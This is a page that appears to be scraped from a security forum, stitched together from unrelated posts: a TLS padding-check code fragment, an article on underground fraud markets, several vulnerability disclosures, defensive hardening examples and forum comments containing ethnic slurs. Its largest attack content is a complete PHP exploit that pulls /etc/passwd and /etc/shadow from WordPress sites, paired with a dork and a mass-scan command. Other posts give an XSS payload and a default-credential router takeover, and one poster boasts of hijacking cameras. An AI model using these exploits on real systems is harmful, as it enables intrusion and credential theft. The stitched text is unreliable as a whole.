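BLOCK_SIZE = 16  # AES block size in bytes (assumed cipher)


def sslv3_style_padding_check(plaintext: bytes) -> bool:
    """Lax check: looks only at the length byte, never at the padding bytes."""
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    return pad_len + 1 <= len(plaintext)


def tls_strict_padding_check(plaintext: bytes) -> bool:
    """
    Strict TLS check: all pad_len + 1 trailing bytes must equal pad_len.
    Every candidate byte is examined even after a mismatch, so the work done
    does not reveal where the first bad byte sits.
    """
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    if pad_len + 1 > len(plaintext):
        return False
    mismatch = 0
    for b in plaintext[-(pad_len + 1):]:
        mismatch |= b ^ pad_len
    return mismatch == 0


def strip_padding(plaintext: bytes) -> Optional[bytes]:
    """Return the payload when the strict check passes, otherwise None."""
    if not tls_strict_padding_check(plaintext):
        return None
    return plaintext[:-(plaintext[-1] + 1)]


def pad(payload: bytes) -> bytes:
    """Append well-formed TLS CBC padding up to the next block boundary."""
    pad_len = (BLOCK_SIZE - (len(payload) + 1) % BLOCK_SIZE) % BLOCK_SIZE
    return payload + bytes([pad_len]) * (pad_len + 1)


def compare_checks() -> Tuple[bool, bool]:
    """
    Constructed record: valid padding with one inner padding byte corrupted
    while the length byte is intact. Returns (lax_result, strict_result):
    the lax check still accepts the record, the strict check does not.
    """
    record = bytearray(pad(b"hello"))  # 5 payload bytes + 11 bytes of 0x0a
    record[-5] ^= 0xFF                 # damage a padding byte, not the length byte
    record = bytes(record)
    return sslv3_style_padding_check(record), tls_strict_padding_check(record)


if __name__ == "__main__":
    print("lax, strict on damaged padding:", compare_checks())  # (True, False)
```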
-
Researchers Go Inside Illegal Underground Hacking Markets
Aerosol posted a topic in Stiri securitate
Underground hacker markets are peddling complete kits to create new identities, elevating in-person fraud scams a tier closer to credit card theft and fraud. Researchers at Dell SecureWorks released an update to 2013 research on black hat markets, noticing a number of noteworthy trends beyond the theft of personal credentials such as passports, driver’s licenses, working Social Security numbers and even utility bills as a second form of authentication. Hacking and crimeware services, for example, continue to mimic legitimate business practices by not only selling services, but also tutorials, notably how-tos on cashing out credit cards, bank transfers, basic carding, basic phishing and many more, Dell SecureWorks researchers Joe Stewart and David Shear wrote in their report. Criminal gangs are also marketing their services, differentiating themselves based on respective service levels and guarantees on stolen data. “It is apparent that the underground hackers are monetizing every piece of data they can steal or buy and are continually adding services so other scammers can successfully carry out online and in-person fraud,” the report said. That doesn’t mean criminals operating online have abandoned the long-profitable stolen credit card as a revenue stream. Premium cards, including fullz, have gone up in price on average of $5 from 2013, selling at about $30; fullz is hacker slang for a full collection of stolen credentials, including name, address, phone number, email addresses, dates of birth, Social Security numbers, bank account numbers, credit card numbers and banking credentials. While the price of individual credit card numbers remains flat or dropped from last year, the price for fullz on a U.S. victim is up to $30, while U.K., Australia, Canada, EU and Asia fullz are up to as high as $45 per record. Premium Master Card and Visa cards that work worldwide and include Track 1 and 2 data are selling for $35 and $23 respectively, Dell SecureWorks said.
Premium cards are classified Black, Platinum, Gold and others by credit card companies. Dell researchers said the number of data breaches has made cards plentiful on the underground, yet prices have not deflated, in particular for non-U.S. cards. One underground site, Dell SecureWorks said, claimed to possess 14 million U.S. cards, 294,000 from Brazil and 342,000 from around the world. While online fraud remains a constant, the inclusion of identity kits, Dell SecureWorks said, is being used for in-person scams, including loan applications, check fraud and more. A new identity, which includes a scan of a working Social Security card, name and address nets $250 underground; the valid utility bill will cost you an extra $100, Dell SecureWorks said. A counterfeit non-US passport, meanwhile, can fetch as much as $500. Training tutorials, on the other hand, run the gamut from basic instruction on selling stolen credit cards to others on running exploit kits, spam, phishing and DDoS campaigns. “These tutorials not only explain what a Crypter, Remote Access Trojan (RAT) and exploit kit is but also how they are used, which are the most popular, and what hackers should pay for these hacker tools,” the report said. Many of these services also come with “satisfaction guarantees,” Shear and Stewart said. Carders are offering in some cases 100 percent guarantees that stolen cards are still valid and have not been canceled. “All dead ones will be replaced,” the report quotes the site. Malware continues to sell well in the underground, Dell SecureWorks said. Remote access Trojans are selling for less than last year, however, ranging from $20 to $50 for notorious RATs such as DarkComet, down considerably from as high as $250 a year ago. A number of free RATs have flooded the market, Dell SecureWorks said, deflating prices.
“Hackers are looking for a RAT that is easily available for purchase or to use for free and which they can run through a Crypter (a program which encrypts malware, making it FUD or fully undetectable to Anti-Virus and Anti-Malware programs),” the report said. As for exploit kits, Nuclear and Sweet Orange seem to fetch the best prices with Sweet Orange going for $450 for a weekly lease to as high as $1,800 for a month.
Source
-
Hello list!
There are Brute Force and Cross-Site Scripting vulnerabilities in D-Link DCS-2103 (IP camera). If the previous Path Traversal and Full path disclosure vulnerabilities were post-auth, then these BF and XSS vulnerabilities are pre-auth.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DCS-2103, Firmware 1.0.0. For the BF vulnerability, version 1.20 and previous versions are vulnerable. Developers refused to fix the BF vulnerability (they think that it's the user's problem to have a strong password) and the XSS vulnerability was fixed in firmware version 1.20.
----------
Details:
----------
Brute Force (WASC-11):
http://site
No protection from BF attacks.
Cross-Site Scripting (WASC-08):
http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
------------
Timeline:
------------
2014.05.22-2014.11.26 - conversation with D-Link about vulnerabilities in DAP-1360.
2014.08.01 - announced at my site about vulnerabilities in DCS-2103.
2014.11.14-2014.12.13 - conversation with D-Link about vulnerabilities in DCS-2103.
2014.12.16 - disclosed at my site (http://websecurity.com.ua/7288/).
I found this and other web cameras during summer to watch terrorists' activities in the Donetsk and Lugansk regions of Ukraine (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html) and I also took control of web cameras in Russia (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-December/009065.html).
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Source
-
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerability that can lead to Command Execution.
Exploit:
1) Login as a normal user
Default Username: User
Password: cikvoip
2) Change the URL to http://URL/adm/system_command.asp and now you can run commands.
Example:
Command: ls /etc_rw/web
Result:
internet cgi-bin homemode_conf.asp menu-en.swf wireless md5.js hotelmode_conf.asp waitAndReboot.asp graphics menu.swf getMac.asp quickconfig.asp javascript firewall home.asp customermode_conf.asp wait.asp station login.asp main.css overview.asp style voip lang wps usb adm
Source
-
Document Title:
===============
iUSB v1.2 iOS - Arbitrary Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1374
Release Date:
=============
2014-12-10
Vulnerability Laboratory ID (VL-ID):
====================================
1374
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
This is very useful software for iDevices users, it lets you share all types of files easily and quickly via wifi. The main functions of iUSB: Share files directly to iDevices via wifi. Share files via wifi using a web browser to the device or computer. Share files via cable to a computer. Manage files and folders easily and efficiently. Allows to open almost common files with formats: MP3, MP4, M4V, MOV, XLS, KEY.ZIP, NUMBERS.ZIP, PAGES.ZIP, PDF, PPT, DOC, RTF, RTFD.ZIP, KEY, NUMBERS, PAGES, TXT, CSV, HTML, HTM. Support for secure your data simply and quickly.
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/iusb/id903716126 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered an arbitrary code execution vulnerability in the official iUSB v1.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-12-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Trung Pham
Product: iUSB - Mobile Web Application (Wifi) 1.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A code execution vulnerability has been discovered in the official iUSB v1.2 iOS mobile web-application. The issue allows remote attackers to execute arbitrary code to compromise the mobile wifi web-application.
The issue is located in the `path` value of the `create folder` input field. Remote attackers with access to the wifi web interface are able to execute system specific code by usage of the vulnerable `create folder` function. The execution of the injected code occurs on the application in the iUSB wifi interface index item listing module. The attack vector is located on the application-side of the app and the request method to execute the code is POST. The security risk of the code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] iUSB File Dir Listing
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: iUSB Wifi UI - (foldername)
<div class="container">
<div class="page-header">
<h1>iUSB</h1>
</div>
<p>Drag & drop files on this window or use the "Upload Files…" button to upload new files.</p>
<div id="alerts"></div>
<div class="btn-toolbar">
<button type="button" class="btn btn-primary fileinput-button">
<span class="glyphicon glyphicon-upload"></span>
Upload Files…
<input id="fileupload" name="files[x]" multiple="" type="file">
</button>
<button type="button" class="btn btn-success" id="create-folder">
<span class="glyphicon glyphicon-folder-close"></span>
Create Folder…
</button>
<button type="button" class="btn btn-default" id="reload">
<span class="glyphicon glyphicon-refresh"></span>
Refresh
</button>
</div>
<div class="panel panel-default uploading">
<div class="panel-heading">File Uploads in Progress</div>
<table class="table table-striped"><tbody id="uploads"></tbody></table>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<ol class="breadcrumb" id="path"></ol>
</div>
<table class="table table-striped"><tbody id="listing">./[CODE EXECUTION VULNERABILITY!];</tbody></table>
</div>
<p class="footer">iUSB 1.2</p>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://192.168.2.104/create
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[192.168.2.104]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104/]
Content-Length[81]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
path[./[CODE EXECUTION VULNERABILITY!];+%3C]
Response Header:
Server[WebUploader]
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Date[Tue, 09 Dec 2014 19:03:58 GMT]
-
Status: 200[OK]
GET http://192.168.2.104/./[CODE EXECUTION VULNERABILITY!];
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Server[WebUploader]
Date[Tue, 09 Dec 2014 19:04:58 GMT]
Connection[Close]
Reference(s):
http://localhost/create
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the create folder name input field. Restrict the input by disallowing special characters. Encode and parse the vulnerable path value that runs through the create POST method request. Also filter and parse the iUSB file dir listing output with the vulnerable name value.
Security Risk:
==============
The security risk of the code execution vulnerability in the create folder function of iUSB is estimated as high. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
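As an added example (not iUSB's code and not Vulnerability Lab's), the two fixes the advisory's solution section asks for, an allow-list on the `create folder` path value and encoding of the name before it is written into the listing HTML, in Python. The handler shape, the `./` prefix handling and the function names are assumptions; the request value is constructed from the advisory's session log.

```python
"""
Hardening the `create folder` request and the directory listing output.

Added example, not code from iUSB or Vulnerability Lab. The advisory's fix
advice is to restrict the folder-name input to safe characters and to encode
the name before it is rendered in the listing HTML; both are shown here on a
constructed POST value. The request framing (handle_create) is assumed.
"""
import html
import re
from typing import List, Optional, Tuple
from urllib.parse import quote

# Allow-list for one folder-name component: letters, digits, space, dot,
# dash and underscore, 1 to 64 characters. Everything else, including the
# `;`, `<`, `/`, `\` and `[` seen in the advisory's payload, is refused.
_SAFE_NAME = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def validate_folder_name(path: str) -> Optional[str]:
    """
    Return the folder name if it is acceptable, otherwise None.

    `path` is the raw POST value; the advisory's log shows the client sending
    it as "./<name>", so a leading "./" is stripped before validation (an
    assumption about the client). Dot-only names (".", "..") and anything
    outside the allow-list are rejected, which also rules out path separators
    and traversal.
    """
    name = path[2:] if path.startswith("./") else path
    name = name.strip()
    if name in ("", ".", ".."):
        return None
    if not _SAFE_NAME.fullmatch(name):
        return None
    return name


def render_listing_row(name: str) -> str:
    """
    One row of the file listing. The name is percent-encoded for the href and
    HTML-escaped for the text node, so even a name that slipped past
    validation cannot inject markup into the page.
    """
    return '<tr><td><a href="./{}">{}</a></td></tr>'.format(
        quote(name, safe=""), html.escape(name, quote=True)
    )


def handle_create(post_path: str, folders: List[str]) -> Tuple[int, str]:
    """
    Emulates the /create handler: returns (status, body). On success the folder
    is added to `folders` and its escaped listing row is returned as the body;
    on rejection nothing is stored and a 400 with a JSON error is returned.
    """
    name = validate_folder_name(post_path)
    if name is None:
        return 400, '{"error": "invalid folder name"}'
    folders.append(name)
    return 200, render_listing_row(name)


if __name__ == "__main__":
    store: List[str] = []
    print(handle_create("./Photos 2014", store))
    print(handle_create("./[CODE EXECUTION VULNERABILITY!];", store))
```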
-
*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:* This exploit allows an attacker to download any writable file from the server
*Usage info:* Put the path of the file in the file's field of the exploit, then click the "Download" button and you get the file directly
File download /etc/passwd & /etc/shadow
The flaw consists of exploiting the $_POST file parameter of /wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*POST:* _mysite_download_skin={$config['file']}&submit=Download
ex: _mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TYPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
# AUTHOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
# ------------------------------------------------------------------------------
# Command exec with the INURLBR scanner:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
# ------------------------------------------------------------------------------
# Download the INURLBR scanner:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

// The target host must be given as the first command-line argument.
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL;

$config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
$config['alvo'] = $alvo_[0][0];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

// Flush the output buffers so progress lines appear immediately.
function __plus() {
    ob_flush();
    flush();
}

// Split a query string into an array of url-encoded parameters.
function __convertUrlQuery($query) {
    $queryParts = explode('&', $query);
    $params = array();
    foreach ($queryParts as $param) {
        $item = explode('=', $param);
        $params[$item[0]] = urlencode($item[1]);
    }
    return $params;
}

// Send the POST request to dl-skin.php and collect the response headers and body.
function __request_info($curl, $config) {
    $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
    $postDados_format = '';
    foreach ($postDados as $campo => $valor) {
        $postDados_format .= $campo . '=' . ($valor) . '&';
    }
    $postDados_format = rtrim($postDados_format, '&');
    curl_setopt($curl, CURLOPT_POST, count($postDados));
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
    curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31');
    curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $corpo = curl_exec($curl);
    $server = curl_getinfo($curl);
    $status = NULL;
    preg_match_all('(HTTP.*)', $corpo, $status['http']);
    preg_match_all('(Server:.*)', $corpo, $status['server']);
    preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
    $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}"));
    curl_close($curl);
    unset($curl);
    return isset($corpo) ? array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE;
}

// Look for passwd-style entries in the response body and record the result.
function main($config, $rest) {
    __plus();
    print "0x " . date("h:i:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n";
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
    $res = NULL;
    if (preg_match("#root#i", $rest['corpo'])) {
        $res .= "0x " . date("h:i:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
        $res .= $config['line'] . "\n";
        foreach ($_final as $value) {
            $res .= "0x " . date("h:i:s") . " [VALUE]: $value\n";
        }
        $res .= $config['line'];
        __plus();
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    } else {
        print "0x " . date("h:i:s") . " [INFO][NOT VULN]\n";
    }
}

print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $config['line'];
print "0x " . date("h:i:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:i:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config, $rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config, $rest);
__plus();
Source
-
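The Echelon exploit above works because dl-skin.php hands the raw _mysite_download_skin value to the file system. The check that stops that class of bug, as an added example that is not code from the post or from the Echelon theme: canonicalise the requested name, require it to stay under the directory the feature serves from, and allow only the file types that feature exists to serve. It is written in Python rather than PHP because the technique is the same in both (realpath() plus a prefix test); the skin directory, the .css/.zip allowlist and the files created in demo() are assumptions constructed for the demonstration.

```python
"""Confining a user-supplied file name to one directory.

Added example, not code from the original post or from the Echelon theme.
Assumptions: skins live in a single directory and are .css or .zip files;
the directory and files built in demo() are constructed for the demo.
"""
import os
import tempfile

ALLOWED_EXTENSIONS = {".css", ".zip"}  # assumption: the types the feature serves


class DownloadRejected(Exception):
    """Raised for any request that must not be served."""


def resolve_skin_path(base_dir, requested):
    """Return the absolute path to serve, or raise DownloadRejected.

    Order matters: the NUL check runs first because os.path.realpath()
    raises ValueError on embedded NUL bytes, and the absolute-path check
    runs before join() because join() discards base_dir for absolute input.
    """
    if not requested or "\x00" in requested:
        raise DownloadRejected("empty or NUL-containing name")
    if os.path.isabs(requested):
        raise DownloadRejected("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath() resolves ../ and follows symlinks, so a symlink planted
    # inside base_dir that points at /etc/passwd fails this test as well.
    if os.path.commonpath([base, candidate]) != base:
        raise DownloadRejected("path escapes skin directory")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        raise DownloadRejected("file type not served")
    if not os.path.isfile(candidate):
        raise DownloadRejected("no such skin")
    return candidate


def demo():
    """Run the post's payload, some variants and a legitimate name through the check.

    Returns a dict mapping each requested name to "served" or "rejected: ...".
    """
    with tempfile.TemporaryDirectory() as tmp:
        skins = os.path.join(tmp, "skins")
        os.mkdir(skins)
        with open(os.path.join(skins, "dark.css"), "w") as fh:
            fh.write("body { background: #000 }\n")  # constructed skin file
        # A symlink inside the skin directory pointing outside it (e.g. left
        # behind by an upload bug); creation may be refused on some platforms.
        try:
            os.symlink("/etc/hostname", os.path.join(skins, "link.css"))
        except OSError:
            pass
        requests = [
            "dark.css",            # legitimate
            "/etc/passwd",         # the post's payload
            "../../etc/passwd",    # traversal variant
            "link.css",            # symlink escape
            "dark.css\x00.txt",    # NUL truncation attempt
        ]
        results = {}
        for name in requests:
            try:
                resolve_skin_path(skins, name)
                results[name] = "served"
            except DownloadRejected as err:
                results[name] = "rejected: %s" % err
        return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-22r %s" % (name, outcome))
```

The prefix test is done on the resolved path of both sides, not on the string the client sent, so encoded dots, mixed separators and symlinks are all judged by where the name actually lands; an allowlist of extensions on top of that means even a file that does sit inside the directory (a config backup, say) is not handed out just because it is there.
-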
@toofast you realize it's tested...
-
@Terry.Crews you misunderstood this whole thing. This video was made to show, so to speak, the "fun parts" of their job. Something like "NASA in another way".
-
@quadxenon I'm already ashamed of stooping to the level of someone like you... stop going off-topic for no reason; first of all, you have an edit button. As for the thing with the gypsy woman, the man is 2 by 2, what could she have done. Plus I live one street away, I got there in 5 minutes. If it's really absolutely necessary I'll go to that friend and film the device so you stop commenting. Someone ban this guy, his place isn't on rst...
-
@quadxenon I'm barely controlling myself, please don't abuse the good manners I have. The man is my buddy and he called me. Now let me explain how it works: when the guys installed the system it asked them for a username & password and they forgot to leave him the credentials. On this Hikvision system, when you want to touch anything (recordings, settings, etc.) it asks for the credentials again and again, so you understand. He could only watch in real time, but if he wanted to rewind it asked him for the credentials. And since we're buddies he gave me a call and I helped him.
-
@quadxenon nobody broke into his shop, a "colored" woman simply stole something from the display window; he saw it but she didn't want to admit it, and he wanted to look at the camera. To look he needed to access the archive, and to access the archive it asked for the username & password. If you don't know, don't talk nonsense (if needed I'll come back with a video). Oh yes, the system was Hikvision.